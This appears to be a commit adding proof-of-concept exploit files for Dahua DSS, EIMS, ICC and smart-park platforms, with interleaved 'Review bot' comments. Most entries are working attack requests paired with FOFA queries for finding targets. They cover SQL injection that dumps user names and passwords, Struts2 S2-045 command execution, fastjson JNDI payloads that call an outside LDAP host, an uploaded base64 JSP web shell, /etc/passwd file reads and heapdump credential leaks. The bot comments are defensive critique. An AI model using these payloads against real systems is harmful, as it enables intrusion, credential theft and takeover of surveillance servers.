Organize files
80
大华/大华DSS itcBulletin SQL 注入漏洞.md
Normal file
@@ -0,0 +1,80 @@
## 大华DSS itcBulletin SQL 注入漏洞
大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞,攻击者可以利用该漏洞获取数据库敏感信息。

## fofa
```
app="dahua-DSS"
```

## poc
```
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>


POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,(select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>

```

## nuclei poc
```
id: dahua-dss-itcBulletin-sqli
info:
name: 大华DSS itcBulletin SQL注入漏洞
author: fgz
severity: high
description: 大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞,攻击者可以利用该漏洞获取数据库敏感信息。
metadata:
fofa-query: app="dahua-DSS"

requests:
- raw:
- |+
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>

matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code==500 && contains(body,"error code [1105]") && contains(body,"6cfe798ba8e5b85feb50164c59f4bec")'
```
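Review bot: the second raw request in the poc block (the `select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user` payload) goes beyond confirming the flaw and pulls account names and password hashes out of the database; a verification PoC should stop at the `md5(102103122)` canary, which is exactly what the nuclei template does, so drop the second request. Two smaller points in the same hunk: the first request hard-codes `Content-Length: 345` while the second omits it, so only one of them replays cleanly; and the matcher string `6cfe798ba8e5b85feb50164c59f4bec` is a 31-character prefix rather than a full MD5 because the `updatexml` XPATH error text is truncated to 32 characters including the leading `~`. Put that in a comment next to the matcher so nobody later "corrects" it, and note for defenders that the same signature (HTTP 500 with `error code [1105]` in the body of an itcBulletin response) is what to alert on in application logs.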
21
大华/大华DSS城市安防监控平台Struct2-045命令执行漏洞.md
Normal file
@@ -0,0 +1,21 @@
## 大华DSS城市安防监控平台Struct2-045命令执行漏洞


## fofa
```
app="dahua-DSS"
```

## poc
```
POST /admin/login_login.action HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
```


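Review bot: "Struct2-045" in the title and in the filename should be "Struts2-045" (the framework is Apache Struts 2, as the neighbouring file's description says itself), and this file has two blank lines where every other entry carries a one-sentence description, so add one. The `Host: {{Hostname}}` placeholder is nuclei syntax in a file that is otherwise a raw request; the other raw requests use `x.x.x.x` or `your-ip`, pick one convention. The trailing image has an empty alt and empty src and renders as nothing. From the defensive side the injection point is the `Content-Type: %{(#nike=...` header, not the path, so a WAF or reverse-proxy rule on a Content-Type value starting with `%{` catches this and the two sibling files at once.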
26
大华/大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞.md
Normal file
@@ -0,0 +1,26 @@
## 大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞

大华DSS安防监控系统平台采用Apache Struts2作为网站应用框架。/portal/login_init.action接口存在远程命令执行漏洞,攻击者可以通过在上传文件时修改HTTP请求标头中的Content Type值来触发该漏洞,然后执行该漏洞。系统命令以获取服务器权限。

## fofa

```
app="dahua-DSS"
```

## poc

```
POST /portal/login_init.action HTTP/1.1
Host:
Connection: close
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_333
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 0

```


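Review bot: the description sentence is broken at the wrong place: "然后执行该漏洞。系统命令以获取服务器权限。" should read "然后执行系统命令以获取服务器权限。" (one sentence, "then execute system commands to gain control of the server"); as written the first clause says "then execute the vulnerability" and the second is a fragment. Same "Struct2" for "Struts2" typo in title and filename as the previous file. `Host:` has no value and the final image is empty. The payload is identical to the login_login.action file apart from the path, so the remediation statement (upgrade Struts 2 to a release that fixes S2-045) belongs in one place rather than being implied three times.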
@@ -0,0 +1,25 @@
## 大华DSS城市安防监控平台user_toLoginPage.action接口存在Struct2-045命令执行漏洞

大华DSS安防监控系统平台采用Apache Struts2作为网站应用框架。/config/user_toLoginPage.action接口存在远程命令执行漏洞,攻击者可以通过在上传文件时修改HTTP请求标头中的Content Type值来触发该漏洞,然后执行该漏洞。系统命令以获取服务器权限。

## fofa

```
app="dahua-DSS"
```

## poc

```
POST /config/user_toLoginPage.action HTTP/1.1
Host:
Connection: close
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_333
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 0
```


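Review bot: this is the third file carrying the byte-identical S2-045 Content-Type payload; only the path differs (`/admin/login_login.action`, `/portal/login_init.action`, `/config/user_toLoginPage.action`). One entry that lists all affected actions would be easier to keep accurate, and it makes the defensive point clearer: the flaw is in the framework's multipart handling, every Struts action on the host is reachable the same way, and the fix is a framework upgrade, not per-endpoint filtering. The description has the same split sentence ("然后执行该漏洞。系统命令以获取服务器权限。") that should read "然后执行系统命令以获取服务器权限。", `Host:` is empty, and the image at the end is empty.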
@@ -0,0 +1,7 @@
## 大华DSS数字监控系统attachment_clearTempFile.action存在SQL注入漏洞


## poc
```
http://ip/portal/attachment_clearTempFile.action?bean.RecId=1*&bean.TabName=1
```
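Review bot: this entry has no description, no fofa section and no statement of what response distinguishes a vulnerable host, so it cannot be verified or turned into a detection rule; at minimum say which parameter is affected (`bean.RecId`, going by the `1*` marker) and what the server returns. The `*` in `bean.RecId=1*` is a tool-specific injection marker rather than part of the URL and should be explained or removed, otherwise a reader will paste it literally. The HTTP method is also unstated; the other entries give a full request line.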
24
大华/大华DSS系统group_saveGroup存在SQL注入漏洞.md
Normal file
@@ -0,0 +1,24 @@
# 大华DSS系统group_saveGroup存在SQL注入漏洞



## fofa

```yaml
app="dahua-DSS"
```

## poc

```javascript
GET /emap/group_saveGroup?groupName=1'%20and%202333=2333%20and%20'hami'='hami&groupDesc=1 HTTP/1.1
Host: xx.xx.xx.xx
Accept-Encoding: identity
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Cache-Control: max-age=0
```

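Review bot: the heading is `#` while every other file in the commit uses `##`, and the fence tags are wrong: `yaml` on a fofa query and `javascript` on a raw HTTP request; use untagged fences like the rest of the repo (or `http` for the request). The `User-Agent` line ends in a stray ` info` that is not part of the header value. The file has no description at all (three blank lines where one sentence should be), and because the `groupName` probe is a boolean condition (`1' and 2333=2333 and 'hami'='hami`) rather than an error-based canary, nothing tells the reader how a vulnerable response differs from a patched one; state that, or the entry cannot be confirmed.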
27
大华/大华EIMS-capture_handle接口远程命令执行漏洞.md
Normal file
@@ -0,0 +1,27 @@
## 大华EIMS-capture_handle接口远程命令执行漏洞

## Zoomeye
```
app:"大华 EIMS"
```

## fofa
```
"<title>eims</title>"
```


## poc
```
GET /config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20xxx.dnslog.cn%20index.pcap HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Host: :9080
```




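Review bot: `Host: :9080` has lost its hostname, so the request is invalid as committed; use a placeholder like the other files. There is no description sentence, and the two trailing images are empty (no alt, no src), which is presumably where the evidence screenshots were meant to be. The `captureCommand` parameter visibly carries an OS command (`ping xxx.dnslog.cn`), and `xxx.dnslog.cn` should be marked as a placeholder for the tester's own callback domain. For defenders, the request path itself (`/config/asst/system_setPassWordValidate.action/capture_handle.action`, a second `.action` appended after the first) is distinctive enough to log and alert on.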
20
大华/大华ICC智能物联综合管理平台heapdump敏感信息泄露.md
Normal file
@@ -0,0 +1,20 @@
# 大华ICC智能物联综合管理平台heapdump敏感信息泄露

大华ICC智能物联综合管理平台heapdump文件敏感信息泄露,可以获取账号和密码。

## fofa

```
body="static/fontshd/font-hd.css" || body="客户端会小于800"
```

## poc

```
/evo-apigw/dsc-mac/heapdump;.js
/evo-apigw/dsc-mac/env;.js
```




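Review bot: the heading uses `#` where the other entries use `##`. The poc block gives two bare paths with no method, no Host placeholder and no indication of what a positive response looks like (a binary heap dump download versus a JSON environment listing), so add a request line and the expected response type as the other files do. The `;.js` suffix on both paths is clearly load-bearing but unexplained; one sentence saying why it is there will stop someone "cleaning" it off. On the defensive side the description already says the dump yields accounts and passwords, so the remediation to record is disabling or authenticating these diagnostic endpoints at the `evo-apigw` gateway. The closing image is empty.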
33
大华/大华ICC智能物联综合管理平台存在fastjson漏洞.md
Normal file
@@ -0,0 +1,33 @@
## 大华ICC智能物联综合管理平台存在fastjson漏洞

大华ICC智能物联综合管理平台是专门为大华股份研发的一款物联网管理平台,它可以对多个智能设备和系统进行统一管理和控制,方便用户实时了解和管理各个设备和系统的状态。该平台提供了一系列的智能化功能,包括设备管理、监控预警、数据分析等,旨在为用户提供更加智能、高效和便捷的物联网管理体验,其使用了alibaba fastjson,存在反序列化漏洞导致RCE。

## fofa
```
body="*客户端会小于800*"
```

## poc
```
POST /evo-runs/v1.0/auths/sysusers/random HTTP/2
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
Content-Length: 144

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://dnslog.cn"}
}""
}
```
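Review bot: the JSON body is not well-formed (an object appears as a value without a key inside `"a":{...}`, and `}""` leaves a dangling string); that looks deliberate, since fastjson's lenient parser accepts it, but the file must say so or the next person to reformat it as valid JSON will silently break the probe. `http://dnslog.cn` should be marked as a placeholder for the tester's own callback host, and `Content-Length: 144` is hard-coded against that exact body. The request line says `HTTP/2` while the rest is HTTP/1.1 framing, which raw-replay tools will not send. The description spends two sentences on product marketing before the one clause that matters ("其使用了alibaba fastjson,存在反序列化漏洞导致RCE"); lead with that and, if known, the affected fastjson version range, which is also what a defender needs to scope the fix.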
26
大华/大华城市安防监控系统平台管理存在user_edit.action信息泄露漏洞.md
Normal file
@@ -0,0 +1,26 @@
## 大华城市安防监控系统平台管理存在user_edit.action信息泄露漏洞

大华DSS城市安防监控平台是一个在通用安防视频监控系统基础上设计开发的系统。该平台user_edit.action泄露了敏感信息漏洞,攻击者可以通过此漏洞获取管理员对应权限。

## fofa

```
app="dahua-DSS"
```

## poc

```
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: keep-alive
Cookie: JSESSIONID=62BBD37D6AD7942778952E5ECE63494B; JSESSIONID=07A0062125A8903E4C6158A0244BABCD
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
```


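Review bot: the `Cookie` header carries two `JSESSIONID` values lifted from a live session; session identifiers should never be committed, replace them with a placeholder. More importantly the header contradicts the description: if the endpoint leaks user data without authentication, as the title implies, the cookie is unnecessary and should be removed; if a session is required, the description must say so because that changes the severity. `Host:` is empty and the trailing image is empty. "泄露了敏感信息漏洞" is ungrammatical (a vulnerability is not leaked); say what the `id=1` response actually discloses, since that is the evidence a reader or a detection rule needs.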
22
大华/大华智慧园区clientServer接口SQL注入漏洞.md
Normal file
@@ -0,0 +1,22 @@
## 大华智慧园区clientServer接口SQL注入漏洞


## poc
```
POST /portal/services/clientServer HTTP/1.1
Host:xxx
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
<soapenv:Header/>
<soapenv:Body>
<cli:getGroupInfoListByGroupId>
<!--type: string-->
<arg0>-5398) UNION ALL SELECT 5336,5336,5336,5336,md5(123456)-- -</arg0>
<!--type: long-->
<arg1>10</arg1>
</cli:getGroupInfoListByGroupId>
</soapenv:Body>
</soap:Envelope>
```
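Review bot: the closing tag `</soap:Envelope>` does not match the opening `<soapenv:Envelope ...>`, so the document is not well-formed XML and a SOAP stack will normally reject it before the `arg0` value reaches any query; either the tag is a paste error (then fix it to `</soapenv:Envelope>`) or the server really accepts it, which would be worth stating. `Host:xxx` and `User-Agent:Mozilla...` are missing the space after the colon. The entry has no description and no fofa section, unlike the rest of the commit, and nothing says what a positive response contains (presumably the md5 value in the returned group list), so it cannot be verified as written.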
26
大华/大华智慧园区getNewStaypointDetailQuery接口SQL注入漏洞.md
Normal file
@@ -0,0 +1,26 @@
## 大华智慧园区getNewStaypointDetailQuery接口SQL注入漏洞



## poc
```
POST /portal/services/carQuery/getNewStaypointDetailQuery HTTP/1.1
Host:xxx
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Content-Length: 491

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:car="http://carQuery.webservice.dssc.dahua.com">
<soapenv:Header/>
<soapenv:Body>
<car:getNewStaypointDetailQuery>
<!--type: string-->
<searchJson>{}</searchJson>
<!--type: string-->
<pageJson>{"orderBy":"1 and 1=updatexml(1,concat(0x7e,md5(123456),0x7e),1)--"}</pageJson>
<!--type: string-->
<extend>quae divum incedo</extend>
</car:getNewStaypointDetailQuery>
</soapenv:Body>
</soapenv:Envelope>
```
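Review bot: no description and no fofa section, three blank lines where the description should be. `<extend>quae divum incedo</extend>` is generator filler text and should be an empty or `{}` value like `searchJson`. `Host:xxx` and `User-Agent:` lack the space after the colon, and `Content-Length: 491` is hard-coded against this exact body. The injected value sits in the `orderBy` key of `pageJson`, the same key the two carQuery/getFaceCapture entries target, which points at a single unparameterised ORDER BY shared by the carQuery service; recording that here lets a defender treat one fix (validate `orderBy` against a whitelist of column names) as covering all three operations.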
20
大华/大华智慧园区管理平台任意文件读取.md
Normal file
@@ -0,0 +1,20 @@

## 大华智慧园区管理平台任意文件读取

大华 城市安防监控系统平台管理 任意文件下载漏洞



## poc
```
GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1
Host: ip:port
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```


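Review bot: the title names the 智慧园区管理平台 (smart-park platform) and calls the issue 任意文件读取, while the description names the 城市安防监控系统平台管理 (city surveillance platform) and calls it 任意文件下载; pick one product and one class, since the mismatch will mislead anyone matching this against an inventory. The description is a title fragment with stray spaces, not a sentence; write one that states the parameter (`filePath`) and that it accepts a `file:///` URL, because that is the fact a defender needs to justify restricting the scheme and path on the server side. There is no fofa section, and both images are empty.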
23
大华/大华智慧园区综合管理平台 deleteFtp 远程命令执行漏洞.md
Normal file
@@ -0,0 +1,23 @@
## 大华智慧园区综合管理平台 deleteFtp 远程命令执行漏洞

## fofa
```
body="src=/WPMS/asset/common/js/jsencrypt.min.js"
```

## poc
```
POST /CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1
Host: Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9Cookie: yourCookieConnection: close
Content-Type: application/json
Content-Length: 189

{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://x.x.x.x","autoCommit":true}}}
```

`ldap://x.x.x.x` 填入dnslog地址 ,发送poc dnslog有请求说明存在漏洞
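Review bot: line breaks were lost on paste, so two header lines each fuse several headers: `Host: Cache-Control: max-age=0` should be `Host: <target>` followed by `Cache-Control: max-age=0`, and `Accept-Language: zh-CN,zh;q=0.9Cookie: yourCookieConnection: close` should be three lines, `Accept-Language: zh-CN,zh;q=0.9`, `Cookie: yourCookie`, `Connection: close`. As committed the request is not valid HTTP. `Content-Length: 189` is hard-coded against the body as written. The body is the fastjson `com.sun.rowset.JdbcRowSetImpl` JNDI pattern also used in the ipms file, so a single request-body detection rule on that `@type` value covers both entries; and the closing note ("fill in a dnslog address, a DNS request means the flaw is present") should also say that only an out-of-band callback is observed, i.e. this PoC demonstrates the JNDI lookup, not the command execution the title claims.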
8
大华/大华智慧园区综合管理平台 searchJson SQL注入漏洞.md
Normal file
@@ -0,0 +1,8 @@
## 大华智慧园区综合管理平台 searchJson SQL注入漏洞
```
GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close
```
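Review bot: this file duplicates 大华智慧园区综合管理平台pageJson存在SQL注入漏洞.md later in the same commit: identical `/portal/services/carQuery/getFaceCapture/searchJson/.../pageJson/.../extend/...` request, differing only in the md5 argument (388609 versus 1). Keep one. The title is also misleading: `searchJson` is `%7B%7D` (an empty object) and the injected `updatexml` probe is in the `orderBy` key of `pageJson`, so the parameter named in the title is not the vulnerable one. There is no description, no fofa section and no `## poc` heading, and no stated success condition (the md5 value echoed in an XPATH syntax error, going by the other updatexml entries).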
24
大华/大华智慧园区综合管理平台 文件上传漏洞.md
Normal file
@@ -0,0 +1,24 @@
## 大华智慧园区综合管理平台 文件上传漏洞
```
POST /publishing/publishing/material/file/video HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close

--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp"

<%@page contentType="text/html; charset=GBK"%><%@page import="java.math.BigInteger"%><%@page import="java.security.MessageDigest"%><% MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";String miyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="poc"

poc
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"

submit
--dd8f988919484abab3816881c55272a7--
```
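Review bot: no description, no fofa section and no `## poc` heading, and nothing records where the uploaded file is served from or what the upload response looks like, so the entry cannot be verified. The uploaded JSP only prints an md5 of a fixed string and then deletes itself, which is the right footprint for a verification PoC; say so in the file, because it is the standard the bitmap upload entry in this same commit fails to meet. `Content-Length: 804` is hard-coded against this exact body and boundary. For defenders, the fact to capture is that the `Filedata` field of `/publishing/publishing/material/file/video` accepts a `.jsp` filename, which is what the server-side extension and content-type check should reject.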
35
大华/大华智慧园区综合管理平台bitmap接口存在任意文件上传漏洞.md
Normal file
@@ -0,0 +1,35 @@
## 大华智慧园区综合管理平台bitmap接口存在任意文件上传漏洞

大华园区综合管理平台/emap/webservice/gis/soap/bitmap接口处存在任意文件上传漏洞,恶意攻击者可能会上传后门文件,造成服务器失陷


## fofa
```
app="dahua-智慧园区综合管理平台"
```



## poc
```
POST /emap/webservice/gis/soap/bitmap HTTP/1.1
Host: your-ip
Content-Type: text/xml; charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:res="http://response.webservice.bitmap.mapbiz.emap.dahuatech.com/">
<soapenv:Header/>
<soapenv:Body>
<res:uploadPicFile>
<arg0>
<picPath>/../rce.jsp</picPath>
</arg0>
<arg1>PCUgaWYoIjEyMyIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkpeyBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7IGludCBhID0gLTE7IGJ5dGVbXSBiID0gbmV3IGJ5dGVbMjA0OF07IG91dC5wcmludCgiPHByZT4iKTsgd2hpbGUoKGE9aW4ucmVhZChiKSkhPS0xKXsgb3V0LnByaW50bG4obmV3IFN0cmluZyhiKSk7IH0gb3V0LnBy aW50KCI8L3ByZT4iKTsgfSAlPg==</arg1>
</res:uploadPicFile>
</soapenv:Body>
</soapenv:Envelope>
```
文件上传路径:http://127.0.0.1/upload/rce.jsp



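Review bot: the base64 in `<arg1>` decodes to a small JSP that runs whatever command a request parameter supplies, i.e. a working web shell, and the final line records that it is written to `/upload/rce.jsp`. That is far beyond what a verification PoC needs and, if this repo feeds a scanner, it leaves a live backdoor on every host it touches; replace the payload with a benign marker, for example the md5-print-and-self-delete JSP used in the 文件上传漏洞 entry of this same commit, and say in the file that the upload evidence is the marker's output. The traversal is already visible in `<picPath>/../rce.jsp</picPath>`, so nothing is lost by removing the shell. The description lacks a full stop, the images are empty, and the `## fofa` block is followed by an empty image where the other entries put the screenshot after the poc.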
21
大华/大华智慧园区综合管理平台ipms接口存在远程代码执行漏洞.md
Normal file
@@ -0,0 +1,21 @@
## 大华智慧园区综合管理平台ipms接口存在远程代码执行漏洞

大华智慧园区综合管理平台/ipms/barpay/pay存在远程代码执行漏洞,允许未经授权的攻击者执行系统命令。

## fofa
```
body="src=/WPMS/asset/common/js/jsencrypt.min.js"
```

## poc
```
POST /ipms/barpay/pay HTTP/1.1
Host: {host}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cmd: whoami
Content-Type: application/json
Accept-Encoding: gzip
Content-Length: 104

{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://gobygo.net/A4", "autoCommit": true}
```
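Review bot: `dataSourceName` points at `ldap://gobygo.net/A4`, a third-party host the tester does not control; a PoC committed to a shared repo must use a placeholder (the deleteFtp entry's `ldap://x.x.x.x` is the convention), otherwise every run hands the target's JNDI lookup, and whatever that server chooses to return, to an unknown party. The `Cmd: whoami` header has no explanation in the file; document its role or drop it. `Host: {host}` is yet another placeholder style (alongside `{{Hostname}}`, `your-ip` and `x.x.x.x`), so standardise. Same fastjson `JdbcRowSetImpl` body as the deleteFtp entry, so one detection rule on that `@type` value in request bodies covers both, and the description's "远程代码执行" should be qualified the same way: the request shown demonstrates a JNDI callback, not the execution itself.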
16
大华/大华智慧园区综合管理平台pageJson存在SQL注入漏洞.md
Normal file
@@ -0,0 +1,16 @@
## 大华智慧园区综合管理平台pageJson存在SQL注入漏洞


## fofa
```
app="dahua-智慧园区综合管理平台"
```

## poc
```
GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
```
